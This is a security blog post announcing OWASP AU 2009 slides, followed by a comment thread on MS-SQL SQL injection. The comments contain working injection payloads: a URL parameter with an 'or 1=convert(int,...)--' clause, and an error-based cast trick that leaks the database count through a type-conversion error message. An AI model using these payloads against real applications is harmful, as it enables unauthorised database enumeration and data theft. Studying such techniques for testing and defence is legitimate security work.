Here are my slides from OWASP AU 2009.
Send Comments/feedbacks at sid–at–notsosecure.com
Thanks for those slides 🙂
nice slides 🙂 I have 1 question, how can i count how many databases are there via sql injection in MS-SQL?I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)), or Select count(name) from master.dbo.sysdatabases
i think you are after this:
Select count(distinct name) from master.dbo.sysdatabases
or you can do select db_name(n)
and enumerate n till you get null.
Hope it helps …:)
tnx for info but not working.I know for the db_name(n) but i need this. asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))–
I don’t see an error. also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))– no success
Don’t know what to do
Thats because, the query returns an integer, and type conversion from int to int is valid and hence no errors.
I will look for some more type conversions to get this returned as error message.
You can still use the blind injection boolean query to get this value, but i think i know what are you after.. 🙂
select cast(‘total database:’+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value ‘total database:6’ to data type int.
Your email address will not be published. Required fields are marked *
This site uses Akismet to reduce spam. Learn how your comment data is processed.